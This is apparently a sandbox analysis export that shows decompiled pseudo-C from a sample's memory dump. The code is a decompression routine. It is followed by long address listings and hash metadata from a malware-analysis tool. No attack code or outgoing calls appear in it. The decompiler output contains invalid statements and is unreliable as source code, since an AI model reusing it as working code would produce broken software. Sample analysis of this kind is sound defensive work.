											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406481
0x00406481
0x00406481
0x00406481
0x00406487
0x0040648b
0x0040648f
0x00406499
0x004064a7
0x0040677d
0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b4
0x004067b8
0x00000000
0x00000000
0x004067ba
0x004067c3
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b8
0x00000000
0x00000000
0x00000000
0x00406813
0x00406813
0x0040678c
0x00406790
0x004068c8
0x004068c8
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406796
0x0040679c
0x004067a3
0x004067ab
0x004067ab
0x004067ae
0x00000000
0x004067ae
0x00406818
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef0
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x0040683b
0x00000000
0x0040683b
0x00405f95
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x0040684a
0x00000000
0x0040684a
0x00406005
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068bc
0x00000000
0x004068bc
0x00406713
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00000000
0x0040604c
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062eb
0x004062ef
0x0040630d
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406414
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406682
0x00406686
0x004066a8
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00406745
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406830
0x00406833
0x00406734
0x00406734
0x00406734
0x00000000
0x0040673a
0x00000000
0x0040646a
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00000000
0x00000000
0x00000000
0x004064af
0x004064af
0x004064b2
0x004064e8
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x00406548
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067b4
0x0040677d

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
